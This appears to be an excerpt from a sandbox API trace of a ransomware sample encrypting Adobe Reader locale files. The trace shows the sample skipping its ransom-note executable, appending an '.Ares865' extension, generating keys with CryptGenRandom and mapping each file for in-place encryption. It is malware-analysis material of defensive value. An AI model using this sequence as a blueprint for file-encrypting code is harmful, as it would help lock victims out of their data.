[0060.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.885] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0060.885] CloseHandle (hObject=0x154) returned 1 [0060.885] CloseHandle (hObject=0x118) returned 1 [0060.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.885] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832ee480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x85c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPKLite.CAT", cAlternateFileName="")) returned 1 [0060.885] lstrcmpiW (lpString1="PPKLite.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.885] lstrcmpiW (lpString1="PPKLite.CAT", lpString2="aoldtz.exe") returned 1 [0060.886] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT.Ares865") returned 80 [0060.886] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ppklite.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ppklite.cat.ares865"), dwFlags=0x1) returned 1 [0060.886] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ppklite.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.886] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=547840) returned 1 [0060.886] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.887] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.887] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.887] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.888] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x85f00, lpName=0x0) returned 0x154 [0060.889] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85f00) returned 0x420000 [0060.909] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.910] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.910] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.911] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0060.916] CloseHandle (hObject=0x154) returned 1 [0060.916] CloseHandle (hObject=0x118) returned 1 [0060.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.918] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x158e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RdLang32.CAT", cAlternateFileName="")) returned 1 [0060.918] lstrcmpiW (lpString1="RdLang32.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.918] lstrcmpiW (lpString1="RdLang32.CAT", lpString2="aoldtz.exe") returned 1 [0060.918] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RdLang32.CAT.Ares865") returned 81 [0060.918] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RdLang32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\rdlang32.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RdLang32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\rdlang32.cat.ares865"), dwFlags=0x1) returned 1 [0060.919] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RdLang32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\rdlang32.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.919] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1412608) returned 1 [0060.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.920] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.921] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.921] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.921] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x159100, lpName=0x0) returned 0x154 [0060.923] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x159100) returned 0x3650000 [0061.010] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.010] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.010] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0061.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0061.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.011] UnmapViewOfFile (lpBaseAddress=0x3650000) returned 1 [0061.024] CloseHandle (hObject=0x154) returned 1 [0061.024] CloseHandle (hObject=0x118) returned 1 [0061.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0061.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0061.030] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8333a740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadOutLoud.CAT", cAlternateFileName="READOU~1.CAT")) returned 1 [0061.030] lstrcmpiW (lpString1="ReadOutLoud.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.030] lstrcmpiW (lpString1="ReadOutLoud.CAT", lpString2="aoldtz.exe") returned 1 [0061.030] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\ReadOutLoud.CAT.Ares865") returned 84 [0061.030] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\ReadOutLoud.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\readoutloud.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\ReadOutLoud.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\readoutloud.cat.ares865"), dwFlags=0x1) returned 1 [0061.031] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\ReadOutLoud.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\readoutloud.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0061.031] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=11264) returned 1 [0061.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0061.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.031] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.032] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.032] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.032] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2f00, lpName=0x0) returned 0x154 [0061.033] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2f00) returned 0x190000 [0061.045] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0061.046] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.046] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0061.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0061.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0061.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.046] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0061.047] CloseHandle (hObject=0x154) returned 1 [0061.047] CloseHandle (hObject=0x118) returned 1 [0061.047] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0061.047] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.047] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0061.047] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db99d60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="reflow.CAT", cAlternateFileName="")) returned 1 [0061.047] lstrcmpiW (lpString1="reflow.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.047] lstrcmpiW (lpString1="reflow.CAT", lpString2="aoldtz.exe") returned 1 [0061.047] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\reflow.CAT.Ares865") returned 79 [0061.047] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\reflow.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\reflow.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\reflow.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\reflow.cat.ares865"), dwFlags=0x1) returned 1 [0061.048] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\reflow.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\reflow.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0061.048] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4608) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.048] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0061.048] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.048] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0061.049] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.049] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0061.049] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1500, lpName=0x0) returned 0x154 [0061.050] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1500) returned 0x190000 [0061.064] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0061.065] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.065] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0061.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0061.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0061.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.065] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0061.066] CloseHandle (hObject=0x154) returned 1 [0061.066] CloseHandle (hObject=0x118) returned 1 [0061.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0061.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0061.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0061.066] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db99d60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SaveAsRTF.CAT", cAlternateFileName="SAVEAS~1.CAT")) returned 1 [0061.066] lstrcmpiW (lpString1="SaveAsRTF.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0061.066] lstrcmpiW (lpString1="SaveAsRTF.CAT", lpString2="aoldtz.exe") returned 1 [0061.066] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SaveAsRTF.CAT.Ares865") returned 82 [0061.066] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SaveAsRTF.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\saveasrtf.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SaveAsRTF.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\saveasrtf.cat.ares865"), dwFlags=0x1) returned 1 [0061.067] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SaveAsRTF.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\saveasrtf.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0061.067] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=19456) returned 1 [0061.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.068] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0061.069] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.069] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0061.069] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f00, lpName=0x0) returned 0x154 [0061.070] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f00) returned 0x190000 [0061.072] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.073] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.073] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0061.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0061.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.073] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0061.074] CloseHandle (hObject=0x154) returned 1 [0061.074] CloseHandle (hObject=0x118) returned 1 [0061.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 